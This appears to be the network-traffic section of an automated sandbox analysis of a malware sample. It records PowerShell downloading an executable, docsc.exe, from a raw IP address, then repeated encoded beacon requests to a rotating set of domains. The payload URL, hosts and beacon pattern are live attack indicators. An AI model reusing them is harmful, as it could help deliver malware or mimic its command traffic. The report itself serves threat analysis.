Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2021 11:33:33.363487959 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.501977921 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.502048016 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.502810001 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.640979052 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641055107 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641078949 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641098976 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641119957 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641139984 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.641141891 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641169071 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641170025 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.641175032 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.641176939 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.641205072 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.641361952 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641403913 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641407967 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.641427994 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641448021 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.641448975 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.641458988 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.641485929 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.645550966 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.779521942 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.779596090 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.779637098 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.779685974 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.779700994 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.779731989 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.779736996 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.779745102 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.779794931 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.779795885 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.779844999 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.779858112 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.779903889 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.779905081 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.779952049 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.779962063 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780015945 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780045986 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780077934 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780097961 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.780117989 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780129910 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.780162096 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.780167103 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780214071 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.780220985 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780263901 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.780265093 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780307055 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780318975 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.780349970 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780361891 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.780390024 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780394077 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.780430079 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.780431032 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.780469894 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.781770945 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.919584036 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.919626951 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.919646025 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.919671059 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.919775963 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921458006 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921487093 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921514034 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921538115 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921546936 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921565056 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921566010 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921580076 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921600103 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921616077 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921641111 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921660900 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921667099 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921674967 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921691895 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921713114 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921731949 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921735048 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921765089 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921775103 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921789885 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921801090 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921825886 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921896935 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921947002 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.921952009 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921977043 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.921996117 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.922005892 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.922008991 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72
May 12, 2021 11:33:33.922033072 CEST | 80 | 49165 | 157.55.173.72 | 192.168.2.22
May 12, 2021 11:33:33.922044992 CEST | 49165 | 80 | 192.168.2.22 | 157.55.173.72

                                              UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2021 11:34:59.769030094 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
May 12, 2021 11:34:59.830743074 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
May 12, 2021 11:35:05.280203104 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
May 12, 2021 11:35:05.580121994 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
May 12, 2021 11:35:11.193069935 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
May 12, 2021 11:35:11.254053116 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
May 12, 2021 11:35:18.582586050 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
May 12, 2021 11:35:18.730459929 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
May 12, 2021 11:35:23.940232992 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
May 12, 2021 11:35:24.006093979 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
May 12, 2021 11:35:29.197446108 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
May 12, 2021 11:35:29.264175892 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
May 12, 2021 11:35:34.638300896 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
May 12, 2021 11:35:34.702411890 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
May 12, 2021 11:35:40.227356911 CEST | 61865 | 53 | 192.168.2.22 | 8.8.8.8
May 12, 2021 11:35:40.419100046 CEST | 53 | 61865 | 8.8.8.8 | 192.168.2.22
May 12, 2021 11:35:46.028728962 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
May 12, 2021 11:35:46.082037926 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22

                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 12, 2021 11:34:59.769030094 CEST | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.boostcoachingonline.com | A (IP address) | IN (0x0001)
May 12, 2021 11:35:05.280203104 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.thepocket-onlinelesson.xyz | A (IP address) | IN (0x0001)
May 12, 2021 11:35:11.193069935 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.qqkit.net | A (IP address) | IN (0x0001)
May 12, 2021 11:35:18.582586050 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.applewholesales.com | A (IP address) | IN (0x0001)
May 12, 2021 11:35:23.940232992 CEST | 192.168.2.22 | 8.8.8.8 | 0x6ec7 | Standard query (0) | www.southernbrushworks.com | A (IP address) | IN (0x0001)
May 12, 2021 11:35:29.197446108 CEST | 192.168.2.22 | 8.8.8.8 | 0xf09a | Standard query (0) | www.betsysellsswfl.com | A (IP address) | IN (0x0001)
May 12, 2021 11:35:34.638300896 CEST | 192.168.2.22 | 8.8.8.8 | 0x18f7 | Standard query (0) | www.ethereumdailypay.com | A (IP address) | IN (0x0001)
May 12, 2021 11:35:40.227356911 CEST | 192.168.2.22 | 8.8.8.8 | 0x4b93 | Standard query (0) | www.foreverjsdesigns.com | A (IP address) | IN (0x0001)
May 12, 2021 11:35:46.028728962 CEST | 192.168.2.22 | 8.8.8.8 | 0xc2d7 | Standard query (0) | www.4520oceanviewavenue.com | A (IP address) | IN (0x0001)

                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 12, 2021 11:34:59.830743074 CEST | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.boostcoachingonline.com | boostcoachingonline.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 11:34:59.830743074 CEST | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | boostcoachingonline.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
May 12, 2021 11:35:05.580121994 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | www.thepocket-onlinelesson.xyz |  | 202.210.8.86 | A (IP address) | IN (0x0001)
May 12, 2021 11:35:11.254053116 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | Name error (3) | www.qqkit.net | none | none | A (IP address) | IN (0x0001)
May 12, 2021 11:35:18.730459929 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | www.applewholesales.com |  | 75.2.115.196 | A (IP address) | IN (0x0001)
May 12, 2021 11:35:24.006093979 CEST | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | www.southernbrushworks.com | southernbrushworks.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 11:35:24.006093979 CEST | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | southernbrushworks.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
May 12, 2021 11:35:29.264175892 CEST | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | www.betsysellsswfl.com | betsysellsswfl.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 11:35:29.264175892 CEST | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | betsysellsswfl.com |  | 107.155.89.74 | A (IP address) | IN (0x0001)
May 12, 2021 11:35:34.702411890 CEST | 8.8.8.8 | 192.168.2.22 | 0x18f7 | No error (0) | www.ethereumdailypay.com | ethereumdailypay.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 11:35:34.702411890 CEST | 8.8.8.8 | 192.168.2.22 | 0x18f7 | No error (0) | ethereumdailypay.com |  | 209.143.158.10 | A (IP address) | IN (0x0001)
May 12, 2021 11:35:40.419100046 CEST | 8.8.8.8 | 192.168.2.22 | 0x4b93 | No error (0) | www.foreverjsdesigns.com | uixie.porkbun.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 11:35:40.419100046 CEST | 8.8.8.8 | 192.168.2.22 | 0x4b93 | No error (0) | uixie.porkbun.com |  | 44.230.85.241 | A (IP address) | IN (0x0001)
May 12, 2021 11:35:46.082037926 CEST | 8.8.8.8 | 192.168.2.22 | 0xc2d7 | No error (0) | www.4520oceanviewavenue.com | 4520oceanviewavenue.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 11:35:46.082037926 CEST | 8.8.8.8 | 192.168.2.22 | 0xc2d7 | No error (0) | 4520oceanviewavenue.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • 157.55.173.72
                                              • www.boostcoachingonline.com
                                              • www.thepocket-onlinelesson.xyz
                                              • www.applewholesales.com
                                              • www.southernbrushworks.com
                                              • www.betsysellsswfl.com
                                              • www.ethereumdailypay.com
                                              • www.foreverjsdesigns.com
                                              • www.4520oceanviewavenue.com

                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 157.55.173.72 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
May 12, 2021 11:33:33.502810001 CEST | 0 | OUT | GET /goose/docsc.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 157.55.173.72
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 157.55.173.72 | 80 | 192.168.2.22 | 49165 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
May 12, 2021 11:33:33.641055107 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Wed, 12 May 2021 09:33:33 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 12 May 2021 07:52:57 GMT
ETag: "edc00-5c21d4c824840"
Accept-Ranges: bytes
Content-Length: 973824
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 89 9b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c2 00 00 00 16 0e 00 00 00 00 00 0a 20 0f 00 00 80 0b 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 88 0b 00 4f 00 00 00 00 40 0c 00 10 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0f 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 48 00 00 00 00 00 00 00 00 00 00 00 12 55 23 6a 3b 46 5f 60 30 58 0b 00 00 20 00 00 00 5a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 88 be 00 00 00 80 0b 00 00 c0 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 b9 02 00 00 40 0c 00 00 ba 02 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 d8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 20 0f 00 00 02 00 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 3c eb aa f7 af
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELT`P @ @@|O@ HU#j;F_`0X Z@.text^ `.rsrc@@@.reloc@B `<


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              10 | 192.168.2.22 | 49173 | 44.230.85.241 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 12, 2021 11:35:40.820713997 CEST | 2052 | OUT | GET /a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV HTTP/1.1
                                              Host: www.foreverjsdesigns.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:41.019629955 CEST | 2052 | IN | HTTP/1.1 307 Temporary Redirect
                                              Server: openresty
                                              Date: Wed, 12 May 2021 09:35:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 168
                                              Connection: close
                                              Location: https://foreverjsdesigns.bigcartel.com
                                              X-Frame-Options: sameorigin
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              11 | 192.168.2.22 | 49174 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 12, 2021 11:35:46.288924932 CEST | 2053 | OUT | GET /a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== HTTP/1.1
                                              Host: www.4520oceanviewavenue.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:46.545229912 CEST | 2054 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.16.1
                                              Date: Wed, 12 May 2021 09:35:46 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 32 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 3c 2f 74 69 74 6c 65 3e 20 20 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 0a 20 20 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 74 6f 75 72 73 2e 74 6f 75 72 69 6d 61 67 69 6e 67 2e 63 6f 6d 2f 73 2f 69 64 78 2f 35 37 37 30 33 33 3f 79 78 6c 34 41 3d 49 4a 42 38 53 70 74 50 4f 56 26 61 6d 70 3b 62 7a 72 44 3d 4f 33 6f 31 55 2b 71 35 6f 4c 57 77 41 6f 34 63 73 4d 34 6b 7a 5a 46 7a 75 76 47 5a 78 31 38 46 32 4a 74 7a 53 67 6f 47 6f 6c 75 66 59 54 71 78 61 59 34 68 52 74 5a 71 53 38 6c 6b 37 76 62 39 4f 64 38 77 42 67 3d 3d 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 2f 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 20a<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head> <title>Tour Imaging Virtual Tours</title> <meta name="description" content="Tour Imaging Virtual Tours"> <meta name="keywords" content="Tour Imaging Virtual Tours"></head><frameset rows="100%,*" border="0"> <frame src="http://tours.tourimaging.com/s/idx/577033?yxl4A=IJB8SptPOV&amp;bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg==" frameborder="0" /></frameset></html>0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              2 | 192.168.2.22 | 49166 | 157.55.173.72 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 12, 2021 11:33:42.378966093 CEST | 1027 | OUT | GET /goose/docsc.exe HTTP/1.1
                                              Host: 157.55.173.72
                                              Connection: Keep-Alive


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              3 | 157.55.173.72 | 80 | 192.168.2.22 | 49166 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              May 12, 2021 11:33:42.518533945 CEST | 1029 | IN | HTTP/1.1 200 OK
                                              Date: Wed, 12 May 2021 09:33:42 GMT
                                              Server: Apache/2.4.18 (Ubuntu)
                                              Last-Modified: Wed, 12 May 2021 07:52:57 GMT
                                              ETag: "edc00-5c21d4c824840"
                                              Accept-Ranges: bytes
                                              Content-Length: 973824
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdos-program
